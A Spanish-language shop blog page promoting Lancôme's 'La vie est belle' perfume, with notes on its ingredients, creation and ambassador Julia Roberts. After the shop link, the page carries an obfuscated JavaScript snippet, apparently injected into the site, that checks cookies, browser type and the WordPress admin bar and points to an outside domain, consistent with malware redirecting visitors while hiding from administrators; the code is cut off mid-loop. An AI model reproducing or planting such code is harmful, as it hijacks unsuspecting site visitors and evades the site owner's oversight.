La vie est belle

Expresión francesa (La vida es bella)

[1]. Filosofía de la vida y de la felicidad o declaración universal a la belleza de la vida.

[2]. Eau de parfum con los ingredientes naturales más nobles [Concreto de Iris Pallida, Absoluto de Jazmín Sambac, Absoluto de Flor de Azahar, Esencia de Pachulí…] sobre un lecho de finas delicias.

[3]. Firma olfativa única exclusivamente creada para Lancôme por tres de los más grandes perfumistas franceses.

 

 

 

Una esencia llena de alma y luz

Su manifiesto olfativo: crear el primer iris apetitoso femenino. Atreverse a romper los códigos para inventar una firma olfativa casi inclasificable, entre luz y sombra.
Para ello, optaron por la fuerza de la sencillez. Una fragancia “quintaesencial” cuya firma está compuesta únicamente por 63 ingredientes para que cada uno se exprese plenamente. Less but better. Un ejercicio tan complejo que ha necesitado al menos 5521 versiones y tres años de trabajo antes de que el alma y la luz eclosionaran.
Un equilibrio sencillo en el que se mezclan la noble rareza del Concreto de Iris, la feminidad del Absoluto de Flor de Azahar y el Absoluto de Jazmín Sambac, la profundidad exaltada de la Esencia de Pachulí y las delicias infantiles de un faceta apetitosa.
Auténtico concentrado de lujo, “La vie est belle” contiene cerca de un 50% de ingredientes naturales, una dosificación que apenas se alcanza hoy día en perfumería.

La embajadora

Si la belleza con alma es por esencia indefinible, Julia Roberts podría ser su perfecta encarnación, la primera en la que pensaríamos, su más evidente embajadora.
Los comités de sabios, reunidos para redactar los diccionarios de referencia, podrían simplemente imprimir su nombre como primera entrada de “feminidad”. También podrían imprimirlo en la entrada “sonrisa”, añadiendo simplemente: véase Julia Roberts.

Puedes adquirir este producto en nuestra tienda online.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone